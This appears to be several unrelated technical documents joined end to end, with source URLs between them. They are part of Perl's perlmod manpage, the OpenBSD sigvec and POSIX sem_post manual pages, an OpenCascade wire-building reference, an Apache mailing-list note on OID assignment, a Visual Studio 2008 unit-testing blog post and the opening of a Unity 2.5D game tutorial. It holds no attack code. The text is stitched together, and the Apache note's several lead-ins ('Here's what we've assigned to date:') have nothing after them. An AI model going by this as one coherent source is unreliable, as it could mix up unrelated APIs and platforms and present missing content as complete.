All Perl module files have the extension <EM>.pm</EM>. [perlfunc:use|use] assumes this so that you don't have to spell out ``<EM>Module.pm</EM>'' in quotes. This also helps to differentiate new modules from old <EM>.pl</EM> and <EM>.ph</EM> files. Module names are also capitalized unless they're functioning as pragmas; ``Pragmas'' are in effect compiler directives, and are sometimes called ``pragmatic modules'' (or even ``pragmata'' if you're a classicist).
<P>
The two statements:
<P>
<PRE>
    require SomeModule;
    require "SomeModule.pm";
</PRE>
<P>
differ from each other in two ways. In the first case, any double colons in the module name, such as <CODE>Some::Module</CODE>, are translated into your system's directory separator, usually ``/''. The second case does not, and would have to be specified literally. The other difference is that seeing the first [perlfunc:require|require] clues in the compiler that uses of indirect object notation involving ``SomeModule'', as in <CODE>$ob = purge SomeModule</CODE>, are method calls, not function calls. (Yes, this really can make a difference.)
<P>
Because the [perlfunc:use|use] statement implies a <CODE>BEGIN</CODE> block, the importation of semantics happens at the moment the [perlfunc:use|use] statement is compiled, before the rest of the file is compiled. This does not happen if you use [perlfunc:require|require] instead of [perlfunc:use|use].
With require you can get into this problem:
<P>
<PRE>
    require Cwd;                # make Cwd:: accessible
    $here = Cwd::getcwd();
</PRE>
<P>
<PRE>
    use Cwd;                    # import names from Cwd::
    $here = getcwd();
</PRE>
<P>
<PRE>
    require Cwd;                # make Cwd:: accessible
    $here = getcwd();           # oops! no main::getcwd()
</PRE>
<P>
In general, <CODE>use Module ()</CODE> is recommended over <CODE>require Module</CODE>, because it determines module availability at compile time, not in the middle of your program's execution. An exception would be if two modules each tried to [perlfunc:use|use] each other, and each also called a function from that other module. In that case, it's easy to use [perlfunc:require|require]s instead.
<P>
Perl packages may be nested inside other package names, so we can have package names containing <CODE>::</CODE>. But if we used that package name directly as a filename it would make for unwieldy or impossible filenames on some systems. Therefore, if a module's name is, say, <CODE>Text::Soundex</CODE>, then its definition is actually found in the library file <EM>Text/Soundex.pm</EM>.
<P>
Perl modules always have a <EM>.pm</EM> file, but there may also be dynamically linked executables or autoloaded subroutine definitions associated with the module. If so, these will be entirely transparent to the user of the module. It is the responsibility of the <EM>.pm</EM> file to load (or arrange to autoload) any additional functionality. The <FONT SIZE=-1>POSIX</FONT> module happens to do both dynamic loading and autoloading, but the user can say just <CODE>use POSIX</CODE> to get it all.
<P>
For more information on writing extension modules, see [perlman:perlxstut|the perlxstut manpage] and [perlman:perlguts|the perlguts manpage].
<P>
<HR>
<H1><A NAME="SEE_ALSO">SEE ALSO</A></H1>
<P>
See [perlman:perlmodlib|the perlmodlib manpage] for general style issues related to building Perl modules and classes as well as descriptions of the standard library and <FONT SIZE=-1>CPAN,</FONT> <U>the Exporter manpage</U><!--../lib/Exporter.html--> for how Perl's standard import/export mechanism works, [perlman:perltoot|the perltoot manpage] for an in-depth tutorial on creating classes, [perlman:perlobj|the perlobj manpage] for a hard-core reference document on objects, and [perlman:perlsub|the perlsub manpage] for an explanation of functions and scoping.
http://www.perlmonks.org/index.pl/jacques?displaytype=xml;node_id=392
SIGVEC(3)                OpenBSD Programmer's Manual                 SIGVEC(3)

NAME
     sigvec - software signal facilities

SYNOPSIS
     #include <signal.h>

     struct sigvec {
             void    (*sv_handler)();
             int     sv_mask;
             int     sv_flags;
     };

     int
     sigvec(int sig, struct sigvec *vec, struct sigvec *ovec);

DESCRIPTION
     The signal mask for a process may be changed with a sigblock(3) or
     sigsetmask(3) call, or when a signal is delivered to the process.
     When a signal is delivered, a new signal mask is formed by taking the
     union of the current signal mask, the signal to be delivered, and the
     signal mask associated with the handler to be invoked.

     sigvec() assigns a handler for a specific signal.  If vec is non-zero,
     it specifies an action (SIG_DFL, SIG_IGN, or a handler routine) and
     mask to be used when delivering the specified signal.  The defaults
     are process termination, possibly with core dump; no action; stopping
     the process; or continuing the process.  See the signal list below for
     each signal's default action.  If sv_handler is set to SIG_IGN, the
     default action for the signal is to discard the signal.

     If a caught signal occurs during certain system calls, the call is
     normally restarted; the call may instead be forced to terminate with
     the error EINTR.  Interrupting of pending calls is requested by
     setting the SV_INTERRUPT bit in sv_flags.

     execve(2) reinstates the default action for all signals which were
     caught and resets all signals to be caught on the user stack.  Ignored
     signals remain ignored; the signal mask remains the same; signals that
     interrupt pending system calls continue to do so.

EXAMPLE
     For an example of signal handler declarations, see sigaction(2).

SEE ALSO
     kill(1), kill(2), ptrace(2), sigaction(2), sigaltstack(2),
     sigpause(2), sigprocmask(2), sigstack(2), sigsuspend(2), setjmp(3),
     sigblock(3), siginterrupt(3), sigsetmask(3), sigsetops(3), sigvec(3),
     tty(4)

OpenBSD 2.6                     April 29, 1991
http://www.rocketaware.com/man/man3/sigvec.3.htm
Provides methods to build wires.

#include <BRepLib_MakeWire.hxx>

A wire may be built:
- through an existing vertex: the edge is shared;
- through a geometric coincidence of vertices: the edge is copied and the vertices from the edge are replaced by the vertices from the wire.

The new edge and the connection vertices are kept by the algorithm.

BRepLib_MakeWire MW;
// for all the edges ...
MW.Add(anEdge);
TopoDS_Wire W = MW;

NotDone MakeWire.
Make a Wire from an edge.
Make a Wire from two edges.
Make a Wire from three edges.
Make a Wire from four edges.
Make a Wire from a Wire. Useful for adding later.
Add an edge to a wire.
Add the edge <E> to the current wire.
Add the edges of <W> to the current wire.
Add the edges of <L> to the current wire. The edges are not to be consecutive, but they are to be all connected geometrically or topologically.
Returns the last edge added to the wire.
Returns the last connecting vertex.
Returns the new wire.
https://dev.opencascade.org/doc/occt-7.1.0/refman/html/class_b_rep_lib___make_wire.html
sem_post - unlock a semaphore (REALTIME)

SYNOPSIS

#include <semaphore.h>

int sem_post(sem_t *sem);

DESCRIPTION

The sem_post() function unlocks the semaphore referenced by sem by performing a semaphore unlock operation on that semaphore.

If the semaphore value resulting from this operation is positive, then no threads were blocked waiting for the semaphore to be unlocked; the semaphore value is simply incremented. If the value of the semaphore resulting from this operation is zero, then one of the threads blocked waiting for the semaphore will be allowed to return successfully from its call to sem_wait().

The sem_post() interface is reentrant with respect to signals and may be invoked from a signal-catching function.

RETURN VALUE

If successful, the sem_post() function returns zero; otherwise the function returns -1 and sets errno to indicate the error.

ERRORS

The sem_post() function will fail if:

- [EINVAL] - The sem does not refer to a valid semaphore.
- [ENOSYS] - The function sem_post() is not supported by this implementation.

EXAMPLES

None.

APPLICATION USAGE

None.

FUTURE DIRECTIONS

None.

SEE ALSO

semctl(), semget(), semop(), sem_trywait(), sem_wait(), <semaphore.h>.

Derived from the POSIX Realtime Extension (1003.1b-1993/1003.1i-1995)
http://pubs.opengroup.org/onlinepubs/007908775/xsh/sem_post.html
OID strings are unique numeric identifiers drawn from a hierarchical numeric namespace controlled by a central authority on the Internet: IANA (the Internet Assigned Numbers Authority). IANA allows companies and organizations to register for a specific OID base called an enterprise number. There can be only one IANA enterprise number per organization. Apache has such an enterprise number. You can look at the IANA assigned numbers here. Here's the record in this database for the Apache Software Foundation:

18060
  The Apache Software Foundation
    Alex Karasulu
      akarasulu@apache.org

This means the ASF can use the unique OID base 1.3.6.1.4.1.18060 for any of its needs. However, we here at the ASF need some kind of internal scheme for assigning these numbers so we do not have collisions. Here's what we've assigned to date:

Each contact person is the authority for assigning unique OID values and ranges to projects or persons. Contact that person for more assignments.

Contacts may wonder what scheme is best for making assignments. There is no rule for doing this. However, some would recommend assigning the first digit past the enterprise number of an organization to identify a protocol. Obviously we did not do this for Apache. The reason is that we feel it's better to model the assignments on the structure of the organization, since these are private ranges and need not conform to a global convention. However, this still does not tell us how contacts should make assignments. I think this is up to you. Perhaps a good example is how the Directory TLP does things, which is somewhat specific to their products and the nature of their products. The ninth component in the OID could be reserved for subprojects like ApacheDS and Triplesec. This might be more attractive in TLPs with many subprojects because a single authority or contact can be used for a specific subproject.
So here could be one assignment scheme:

Here's how the ApacheDS OID is branched off:

And here are the schema OIDs:

Here are the new OIDs used:
http://mail-archives.apache.org/mod_mbox/directory-commits/200911.mbox/raw/%3C1617550997.1740.1258304040020.JavaMail.www-data@brutus%3E/
The purpose of this blog entry is to explain how you can create unit tests by using Visual Studio 2008. I’m not interested in unit tests in general -- I’m interested in building a particular type of unit test. I want to build unit tests that can be used when following good Test-Driven Development (TDD) practices when building ASP.NET MVC Web Application projects. Not all unit tests are good TDD tests. In order for a unit test to be useful for Test-Driven Development, you must be able to execute the unit test very quickly. Not all unit tests meet this requirement. For example, Visual Studio supports a special type of unit test for ASP.NET websites. You must execute this type of unit test in the context of either IIS or the development web server. This is not an appropriate type of unit test to use when practicing Test-Driven Development because this type of unit test is just too slow. In this blog entry, I’m going to provide you with a walk-through of the process of building unit tests that can be used for Test-Driven Development. I’m going to dive into the details of the Visual Studio 2008 unit testing framework. I’m also going to discuss several advanced topics such as how you can test private methods and how you can execute tests from the command line. Note: Most of the features described in this blog entry are supported by the Professional Edition of Visual Studio 2008. Unfortunately, these features are not supported by Visual Web Developer. For a comparison of the unit testing features that each edition of Visual Studio 2008 supports, see. Let’s start by creating a new ASP.NET MVC Web Application project and creating a Test Project. This part is easy. When you create a new ASP.NET MVC Web Application project, you are prompted to create a new Visual Studio Test Project. Just as long as you leave the top radio button selected -- the default option -- you get a new Test Project added to your solution automatically (see Figure 1). 
Figure 1 – Creating a New ASP.NET MVC Web Application Project

The question is: now that you have a Test Project, what do you do with it? When you create a new ASP.NET MVC application, the project includes one controller named HomeController. This default controller has two methods named Index() and About(). Corresponding to the HomeController, the Test Project includes a file named HomeControllerTest. This file contains two test methods named Index() and About(). The two test methods, Index() and About(), are empty by default (see Figure 2). You can add your test logic into the body of these methods.

Figure 2 – Empty About() test method ready to be written.

Let's imagine that you want to build an online store. Imagine that you want to create a Details page for your store that displays details for a particular product. You pass a query string that contains a product Id to the Details page, and the product details are retrieved from the database and displayed. Following good Test-Driven Development practice, before you do anything else, you first write a test. You don't write any application code until you have a test for the code.

The tests for the Details page act as the criteria for success. To create a successful Details page, the following tests must be satisfied:

1. If a ProductId is not passed to the page, an exception should be thrown
2. The ProductId should be used to retrieve a Product from the database
3. If a matching Product cannot be retrieved from the database, an exception should be thrown
4. The Details View should be rendered
5. The Product should be assigned to the Details View's ViewData

So let's implement the first test. According to the first test, if a ProductId is not passed to the Details page, an exception should be thrown. We need to add a new unit test to our Test Project. Right-click the Controllers folder in your Test Project and select Add, New Test. Select the Unit Test Template (see Figure 2).
Name the new unit test ProductControllerTest.

Figure 2 – Adding a new unit test

Be careful about how you create a new unit test, since there are multiple ways to add a unit test in the wrong way. For example, if you right-click the Controllers folder and select Add, Unit Test, then you get the Unit Test Wizard. This wizard generates a unit test that runs in the context of a web server. That’s not what we want. If you see the dialog box in Figure 3, then you know that you have attempted to add an MVC unit test in the wrong way.

Figure 3 – Whenever you see this dialog box, click the Cancel button!

The ProductControllerTest, by default, contains the single test method in Listing 1.

Listing 1 – ProductControllerTest.cs (original)

[TestMethod]
public void TestMethod1()
{
    //
    // TODO: Add test logic here
    //
}

We want to modify this test method so that it tests whether an exception is thrown when the Details page is requested without a ProductId. The correct test is contained in Listing 2.

Listing 2 – ProductControllerTest.cs (modified)

[TestMethod]
[ExpectedException(typeof(ArgumentNullException), "Exception no ProductId")]
public void Details_NoProductId_ThrowException()
{
    ProductController controller = new ProductController();
    controller.Details(null);
}

Let me explain what is going on with the test in Listing 2. The method is decorated with two attributes. The first attribute, [TestMethod], identifies the method as a test method. The second attribute, [ExpectedException], sets up an expectation for the test. If executing the test method does not throw an ArgumentNullException, then the test fails. We want the test to throw an exception because we want an exception to be thrown when the Details page is requested without a ProductId. The body of the test method contains two statements. The first statement creates an instance of the ProductController class. The second statement calls the controller’s Details() method.
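For completeness, the remaining items from the success-criteria list can also be captured right away as stubs in ProductControllerTest. This is only a sketch of my own -- the method names are invented, and the later tests would need infrastructure (such as a fake product repository) that we have not built yet -- but marking each stub Inconclusive keeps the outstanding work visible in the Test Results window:

```csharp
[TestMethod]
public void Details_ProductId_RetrievesProductFromDatabase()
{
    // Criterion 2: the ProductId should be used to retrieve a Product
    Assert.Inconclusive("Not written yet");
}

[TestMethod]
public void Details_UnknownProductId_ThrowsException()
{
    // Criterion 3: a missing Product should cause an exception
    Assert.Inconclusive("Not written yet");
}

[TestMethod]
public void Details_RendersDetailsView()
{
    // Criterion 4: the Details view should be rendered
    Assert.Inconclusive("Not written yet");
}

[TestMethod]
public void Details_AssignsProductToViewData()
{
    // Criterion 5: the Product should be assigned to the view's ViewData
    Assert.Inconclusive("Not written yet");
}
```

Inconclusive results show up in yellow rather than red, which makes it easy to tell "not written yet" apart from a genuine failure.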
Now, at this point, we have not created the ProductController class in our MVC application. So there is no way that this test will execute successfully. But that is okay. This is the correct path to walk when practicing Test-Driven Development. First, you write a test that fails, and then you write code to fix it. So let’s run the test so we can enjoy some failure.

There should be a toolbar at the top of the code editor window that contains two buttons for running tests. The first button runs the tests in the current context and the second button runs all the tests in the solution (see Figure 4).

Figure 4 – Executing Visual Studio 2008 Tests

What’s the difference between clicking the two buttons? Running tests in the current context executes different tests depending on the location of your cursor in the code editor window. If your cursor is located on a particular test method, only that method is executed. If your cursor is located on the test class, all tests in the test class are executed. If the Test Results window has focus, all of your tests are executed (for details, see).

Actually, you should always strive to avoid clicking buttons with your mouse. Clicking buttons is slow, and Test-Driven Development is all about executing tests quickly. You can execute tests by using these keyboard combinations:

· Ctrl-R, A – Run all tests in solution
· Ctrl-R, T – Run all tests in current context
· Ctrl-R, N – Run all tests in current namespace
· Ctrl-R, C – Run all tests in current class
· Ctrl-R, Ctrl-A – Debug all tests in solution
· Ctrl-R, Ctrl-T – Debug all tests in current context
· Ctrl-R, Ctrl-N – Debug all tests in current namespace
· Ctrl-R, Ctrl-C – Debug all tests in current class

If you run the test method that we just created -- by hitting Ctrl-R, A -- it will fail miserably. The test won’t even compile, since we have not created the ProductController class or a Details() method. This is what we need to do next.
Switching back to the ASP.NET MVC project, right-click the Controllers folder and select Add, New Item. Select the Web category and select MVC Controller Class. Name the new controller ProductController and click the Add button (or just hit the Enter key). A new controller is created that includes one Index() method. We want to write the bare minimum amount of code necessary to cause our unit test to pass. The ProductController class in Listing 3 will pass our unit test.

Listing 3 – ProductController.cs

using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.Mvc;

namespace MvcApplication3.Controllers
{
    public class ProductController : Controller
    {
        public void Details(int? ProductId)
        {
            throw new ArgumentNullException("ProductId");
        }
    }
}

The class in Listing 3 contains one method named Details(). I erased the Index() method that you get by default when you create a new controller. The Details() method always throws an ArgumentNullException.

After entering the code in Listing 3, hit the keyboard combination Ctrl-R, A (you don’t need to switch back to the Test Project to run the test). The Test Results window shows that our test passed (see Figure 5).

Figure 5 – The happy green of a test successfully passed

You might be thinking that this is crazy. Currently, our Details() method always throws an exception. And, yes, the Details() method would be a crazy method to use in a production application. However, the whole point of Test-Driven Development is that you focus on satisfying the test that is sitting in front of you right now. Later tests will force you to triangulate and build a more respectable looking controller method.

When we built our test in the previous section, we were required to use the following two attributes:

· [TestMethod] – Used to mark a method as a test method.
Only methods marked with this attribute will run when you run your tests.

· [TestClass] – Used to mark a class as a test class. Only classes marked with this attribute will run when you run your tests.

When building tests, you always use the [TestMethod] and [TestClass] attributes. However, there are several other useful, but optional, test attributes. For example, you can use the following attribute pairs to set up and tear down tests:

· [AssemblyInitialize] and [AssemblyCleanup] – Used to mark methods that execute before and after all of the tests in an assembly are executed
· [ClassInitialize] and [ClassCleanup] – Used to mark methods that execute before and after all of the tests in a class are executed
· [TestInitialize] and [TestCleanup] – Used to mark methods that execute before and after each test method is executed

For example, you might want to create a fake HttpContext that you can use with all of your test methods. You can set up the fake HttpContext in a method marked with the [ClassInitialize] attribute and dispose of the fake HttpContext in a method marked with the [ClassCleanup] attribute.

There are several attributes that you can use to provide additional information about test methods. These attributes are useful when you are working with hundreds of unit tests and you need to manage the tests by sorting and filtering them:

· [Owner] – Enables you to specify the author of a test method
· [Description] – Enables you to provide a description of a test method
· [Priority] – Enables you to specify an integer priority for a test
· [TestProperty] – Enables you to specify an arbitrary test property

You can use these attributes when sorting and filtering tests in either the Test View window or the Test List Editor. Finally, there is an attribute that you can use to cause a particular test method to be ignored when running a test.
This attribute is useful when one of your tests has a problem and you just don’t want to deal with the problem at the moment:

· [Ignore] – Enables you to temporarily disable a test. You can use this attribute on either a test method or an entire test class

Most of the time, when you are writing the code for your test methods, you use the methods of the Assert class. The last line of code contained in most test methods uses the Assert class to assert a condition that a test must satisfy in order for the test to pass. The Assert class supports the following static methods:

· AreEqual – Asserts that two values are equal
· AreNotEqual – Asserts that two values are not equal
· AreNotSame – Asserts that two objects are different objects
· AreSame – Asserts that two objects are the same object
· Fail – Asserts that the test fails
· Inconclusive – Asserts that a test result is inconclusive. Visual Studio includes this assertion in methods that it generates automatically and that you still need to implement
· IsFalse – Asserts that a given condition expression returns the value False
· IsInstanceOfType – Asserts that a given object is an instance of a specified type
· IsNotInstanceOfType – Asserts that a given object is not an instance of a specified type
· IsNotNull – Asserts that an object does not represent the Null value
· IsNull – Asserts that an object represents the Null value
· IsTrue – Asserts that a given condition expression returns the value True
· ReplaceNullChars – Replaces null characters (\0) in a string with \\0

When an Assert method fails, the Assert class throws an AssertFailedException. For example, imagine that you are writing a unit test to test a method that adds two numbers. The test method in Listing 4 uses an Assert method to check whether the method being tested returns the correct result for 2 + 2.
Listing 4 – CalculateTest.cs

[TestMethod]
public void AddNumbersTest()
{
    int result = Calculate.Add(2, 2);
    Assert.AreEqual(result, 2 + 2);
}

There is a special class for testing assertions about collections named the CollectionAssert class. The CollectionAssert class supports the following static methods:

· AllItemsAreInstancesOfType – Asserts that each item in a collection is of a specified type
· AllItemsAreNotNull – Asserts that each item in a collection is not null
· AllItemsAreUnique – Asserts that each item in a collection is unique
· AreEqual – Asserts that the values of the items in two collections are equal
· AreEquivalent – Asserts that the values of the items in two collections are equal (but the order of the items in the first collection might not match the order of the items in the second collection)
· AreNotEqual – Asserts that two collections are not equal
· AreNotEquivalent – Asserts that two collections are not equivalent
· Contains – Asserts that a collection contains an item
· DoesNotContain – Asserts that a collection does not contain an item
· IsNotSubsetOf – Asserts that one collection is not a subset of another collection
· IsSubsetOf – Asserts that one collection is a subset of another collection

There is also a special class, named StringAssert, for performing assertions about strings. The StringAssert class supports the following static methods:

· Contains – Asserts that a string contains a specified substring
· DoesNotMatch – Asserts that a string does not match a specified regular expression
· EndsWith – Asserts that a string ends with a specified substring
· Matches – Asserts that a string matches a specified regular expression
· StartsWith – Asserts that a string starts with a specified substring

Finally, you can use the [ExpectedException] attribute to assert that a test method should throw a particular type of exception.
We used the [ExpectedException] attribute in the walkthrough above to test whether a null ProductId caused a controller to throw an ArgumentNullException.

Visual Studio 2008 enables you to generate unit tests from existing code automatically. You can right-click any method in a class and select the option Create Unit Tests.

Figure 6 – Generating a unit test from existing code

Even practitioners of Test-Driven Development must work with legacy code. If you need to add unit tests to existing code, you can take advantage of this option to quickly create the necessary test method stubs.

One big warning about this approach to adding unit tests: if you use this option on a class located in an ASP.NET MVC Web Application project, then the Unit Test Wizard opens. Unfortunately, this wizard generates a unit test that executes within the context of a web server. This type of unit test is not appropriate for Test-Driven Development because it simply takes too long to execute. Therefore, I recommend that you take the approach to generating unit tests described in this section only when working with Class Library projects.

When following good Test-Driven Development practices, you test all of your code, including the private methods in your application. How do you test private methods from your test project? The problem, it might seem, is that you cannot call the private methods from within a unit test. There are two ways around this problem.

First, Visual Studio 2008 can generate a façade class that exposes all the private members of the class being tested. Within Visual Studio 2008, you can right-click any class within the Code Editor and select the menu option Create Private Accessor. Selecting this menu option generates a new class that exposes all of the private methods, private properties, and private fields of the original class as public methods, public properties, and public fields.
For example, imagine that you want to test a class named Calculate that contains a private method named Subtract(). You can right-click this class and generate an Accessor (see Figure 7).

Figure 7 – Creating a Private Accessor

After you create the Accessor, you can use it in your unit test code to test the Subtract() method. For example, the unit test in Listing 5 tests whether the Subtract() method returns the right result for 7 – 5.

Listing 5 – CalculateTest.cs (Accessor)

[TestMethod]
public void SubtractTest()
{
    int result = Calculate_Accessor.Subtract(7, 5);
    Assert.AreEqual(result, 7 - 5);
}

Notice that in Listing 5, the Subtract() method is called on the Calculate_Accessor class and not the Calculate class. Because the Subtract() method is private, you can’t call it on the Calculate class. However, the generated Calculate_Accessor class exposes the method just fine. If you prefer, you can generate the Accessor class from the command line. Visual Studio includes a command line tool named Publicize.exe that generates a public façade for a class with private members.

The second method for testing private class methods is to use reflection. By taking advantage of reflection, you can bypass access restrictions and invoke any class method and access any class property. The test in Listing 6 uses reflection to call the private Calculate.Subtract() method.

Listing 6 – CalculateTest.cs (reflection)

[TestMethod]
public void SubtractReflectionTest()
{
    MethodInfo method = typeof(Calculate).GetMethod("Subtract",
        BindingFlags.NonPublic | BindingFlags.Static);
    int result = (int)method.Invoke(null, new object[] { 7, 5 });
    Assert.AreEqual(result, 7 - 5);
}

The code in Listing 6 calls the private static Subtract() method by calling the Invoke() method on a MethodInfo object that represents the Subtract() method (this is the kind of code that you would want to package into a utility class so that it would be easy to reuse for other tests).
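As the parenthetical note above suggests, the reflection call can be packaged into a small utility class so other tests can reuse it. Here is one possible sketch -- the class and method names (PrivateInvoker, InvokeStatic) are my own inventions, not part of the article's sample code:

```csharp
using System;
using System.Reflection;

// Hypothetical helper for invoking private static methods from unit tests.
public static class PrivateInvoker
{
    public static object InvokeStatic(Type type, string methodName, params object[] args)
    {
        MethodInfo method = type.GetMethod(methodName,
            BindingFlags.NonPublic | BindingFlags.Static);
        if (method == null)
        {
            throw new ArgumentException("No private static method named " + methodName);
        }
        // Pass null as the target because the method is static.
        return method.Invoke(null, args);
    }
}
```

A test could then call (int)PrivateInvoker.InvokeStatic(typeof(Calculate), "Subtract", 7, 5). Note that the Microsoft.VisualStudio.TestTools.UnitTesting namespace also provides the PrivateObject and PrivateType classes, which serve a similar purpose out of the box.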
I confess that one of my main motivations for writing this blog entry was that I was confused by all of the various test windows and I wanted to sort them out. Visual Studio 2008 has three windows related to unit tests.

First, there is the Test Results window (see Figure 8). This window is displayed after you run your tests. You can also display this window by selecting the menu option Test, Windows, Test Results. The Test Results window displays each test that was run and shows whether the test failed or passed.

Figure 8 – The Test Results window

If you click the link labeled Test run completed or Test run failed, you get a page that provides more detailed information about the test run.

Second, there is the Test View window (see Figure 9). You can open the Test View window by selecting the menu option Test, Windows, Test View. The Test View window lists all of your tests. You can select an individual test and run it. You can also filter the tests in the Test View using particular test properties (for example, show only the tests written by Stephen).

Figure 9 – The Test View window

Third, there is the Test List Editor window (see Figure 10). Open this window by selecting the menu option Test, Windows, Test List Editor. This window enables you to organize your tests into different lists. You can create new lists of tests and add the same test to multiple lists. Creating multiple test lists is useful when you need to manage hundreds of tests.

Figure 10 – The Test List Editor window

After you execute your unit tests more than 25 times, you get the dialog box in Figure 11. Until I received this warning, I didn’t realize that Visual Studio creates a separate copy of all of the assemblies in a solution each time you do a test run (each time you run your unit tests).
Figure 11 – A mysterious message about test runs

If you use Windows Explorer and take a look inside your application’s solution folder on disk, you can see a folder named TestResults that Visual Studio 2008 creates for you automatically. This folder contains an XML file and a subfolder for each test run.

You can prevent Visual Studio 2008 from creating copies of your assemblies for each test run by disabling test deployment. To do this, you modify your test run configuration file. Select the menu option Test, Edit Test Run Configurations. Select the Deployment tab and uncheck the checkbox labeled Enable deployment.

Figure 12 – Disabling Test Deployment

Sometimes, when you go to the Test, Edit Test Run Configurations menu item, you see a message that there are no test run configurations available. In that case, you need to right-click your solution in the Solution Explorer window, select Add, New Item, and add a new Test Run Configuration. After you add a new Test Run Configuration file, you can open the dialog box in Figure 12.

Be warned that if you disable test deployment, you can no longer take advantage of the code coverage feature. If you aren’t using this feature, then don’t worry about it.

You might want to run your unit tests from the command line. For example, you might just have a perverse dislike for Integrated Development Environments like Visual Studio and want to write all of your code using Notepad. Or, more likely, you might want to run your tests automatically as part of a custom code check-in policy. You run your tests from the command line by opening a Visual Studio 2008 Command Prompt (All Programs, Microsoft Visual Studio 2008, Visual Studio Tools, Visual Studio 2008 Command Prompt). After you open the command prompt, navigate to the assembly generated by your test project.
For example:

Documents\Visual Studio 2008\Projects\MyMvcApp\MyMvcAppTests\Bin\Debug

Run your tests by executing the following command:

mstest /testcontainer:MyMvcAppTests.dll

Issuing this command will run all of your tests (see Figure 13).

Figure 13 – Running your unit tests from the command line

The goal of this blog entry was to get a better understanding of how you can use Visual Studio 2008 to write unit tests that can be used for Test-Driven Development. Visual Studio was designed to support many different types of tests and many different testing audiences. The sheer number of testing options (and test-related windows) can be overwhelming. However, I hope that I have convinced you that Visual Studio 2008 can be a very effective environment for performing Test-Driven Development. Okay, so if you ignored everything else in this blog entry, at least remember that using the keyboard combination Ctrl-R, A runs all of the tests in your solution. Enough said.
How To Make a 2.5D Game With Unity Tutorial: Part 1

A while back, you guys said you wanted a tutorial on “How To Make a 2.5D Game.” You guys wanted it, you got it! If you don’t know what a 2.5D game is, it’s basically a 3D game that you squish so the gameplay is only along a 2D axis. Some good examples are Super Mario Brothers Wii, Little Big Planet, or Paper Monsters.

One great way to make 2.5D games (or 3D games too!) is via a popular, easy, and affordable game development tool named Unity. So in this tutorial series, I’m going to show you how you can use Unity to create a simple 2.5D game called “Shark Bomber!” If you’re new to Unity but would like to learn it, this tutorial is for you! You’ll learn how to make a simple game from scratch and learn a ton along the way.

In this game, you take control of a small (but well-armed!) airplane, and your job is to bomb the evil sharks while protecting the lovely clownfish!

Unity doesn’t use Objective-C, so for this tutorial, you don’t need any Objective-C experience. However, some experience with an OO language is a plus – ideally C#, Java, or ActionScript. Keep in mind that this is a Mac-users tutorial – Windows users might not find it accurate for their setups. Also, keep in mind you will test on an iOS device only (not the simulator) – so make sure you have a device ready to work with!

OK, so let’s dive into Unity – but be sure to avoid those sharks! :]

Installing Unity

First let’s install the Unity editor – if you already have it on your Mac, just skip this step. Download Unity from its download page. Once you have the DMG file, mount it and start the Unity installer; after a standard installation procedure you will have a /Applications/Unity folder where the binaries are located. Start Unity, and click the “Register” button (don’t worry, you can try it out for free). Select “Internet activation”, click Next, and fill in the form on the web page that appears.
Important: For this tutorial, you need to choose the “Start Pro / iOS Trial” option so you can publish to the iPhone (not the plain “Free” option!)

After registration completes, Unity should start up and you should see a window that looks something like this:

Close down the “Welcome to Unity” popup, go to File\New Project, choose a folder somewhere on your disk and name the project SharkBomber. Make sure all the packages are unselected, and click Create Project. Now you’re at a blank slate. Wow, there are a lot of buttons, eh? Don’t worry – in the next section we’ll go over it bit by bit.

Unity Editor Overview

Let’s do some additional setup to get things into a known configuration. In the top right-hand corner of the application window you’ll find a select box – select “Tall” from the list. This will rearrange the window contents (the default was “Wide”, FYI). Now find the tab in the top left corner (just below the toolbar) saying “Game” – drag it near the bottom of the window until you see an indication that it’ll snap to the bottom, and drop it there. Now you should see the layout from the picture below:

Let’s go quickly over the different panels:

- Scene: Here you move your 3D models around and can browse your 3D world.
- Game: This is what your selected camera (in this case the main camera) sees, updated in real time even while you use the editor; your game runs in this panel when you hit “Run”, and this is where you test your game.
- Hierarchy: Your objects’ tree (much like the HTML DOM, for example). Currently you have only a camera, but we’ll add some stuff here later on; the objects in this list are the ones currently present on the scene.
- Project: This is the contents of your project – your assets, audio files, everything you will be using now or later on.
- Inspector: Here you see all the properties of the selected object in the scene and you can adjust them; what’s unique about Unity is that the Inspector stays live when you run your scene, so it’s your debugger too!
- Toolbar: Here you have the tools to interact with the objects in your scene, plus the Run and Pause buttons to test your scene.

In your Unity3D project you can have many different scenes, and you can switch between them. Currently you have one empty scene open in the editor. Let’s save it.

- Right-click inside the Project panel and choose “Create/Folder” – a new folder appears.
- Rename it to “Scenes” – you can do this by a single left-click on the folder name, or by selecting the folder and pressing “Enter”.
- Now from the main menu choose “File/Save scene” – navigate the save dialogue to [your project directory]/Assets/Scenes and save the scene as “LevelScene”.

Phew! OK – that’s done. Let’s check – in your Project panel, open the Scenes folder – there’s your LevelScene scene. Cool! Now we are ready to run the game – hit the Play button on top! Not much changes – but in fact your game is running inside the Game panel! Don’t forget to stop the game by clicking the Play button again (this is important!)

Setting up an iPhone Unity3D project

One of the nice things about Unity is that it can build games for iPhone, Mac, Wii, and other platforms. In this tutorial we’ll be building an iPhone game, so we need to set up some details first. From the menu, choose “File/Build Settings” and click the “Add current” button to add the currently selected scene to the project. You can see when it’s added that it’s got an index of “0”, which means it’ll be the first scene to be loaded when the game starts. This is exactly what we want. From the Platform list select iOS and click the “Switch platform” button. The Unity logo now appears in the iOS row. This is all the setup we need for now; click “Player settings” and close this popup window. You’ll notice the Player settings opened in the Inspector; we need to set a couple of things in here too.
In the “Per platform” strip, make sure the tab showing an iPhone is selected, like so:

There are lots of settings here; you know most of them from Xcode, so you can play and explore yourself later on. Now use this inspector to make the following changes:

- In the “Resolution and Presentation” strip, for “Default orientation” select “Landscape Left”.
- In the “Other settings” strip, for Bundle Identifier put in whatever you want (except the default value).
- In the “Other settings” strip, set the Target device to “iPhone only”.

One final touch: to the left, under the “Game” tab, you now have different orientations/resolutions available – select “iPhone Wide (480×320)” to match the default landscape orientation.

Congrats – you now have a basic “Hello World” project that you can try out on your iPhone!

Running the Game on Your iPhone

To test everything we did up to now, we’re going to finish by testing the project in Xcode and on your iPhone. Start up your favorite Xcode version – close the welcome screen if there’s one – and switch back to Unity. This is a trick to tell Unity which Xcode version to use – just have it running alongside.

Back in Unity, from the menu choose “File\Build&Run” – this will pop up the Build Settings again; click the “Build and Run” button. You will be asked where you want to save your Xcode project (they don’t really say that, but this is what they are asking). Inside your project directory, create a folder called “SharkBomberXcode” (this is where your Xcode stuff will reside) and as the file name put in “SharkBomber”. After a few moments the project is built and an Xcode window pops up with a project opened called Unity-iPhone. What happened is that Unity has generated the source code of an Xcode project, and you now have this generated project ready to build and run from Xcode.
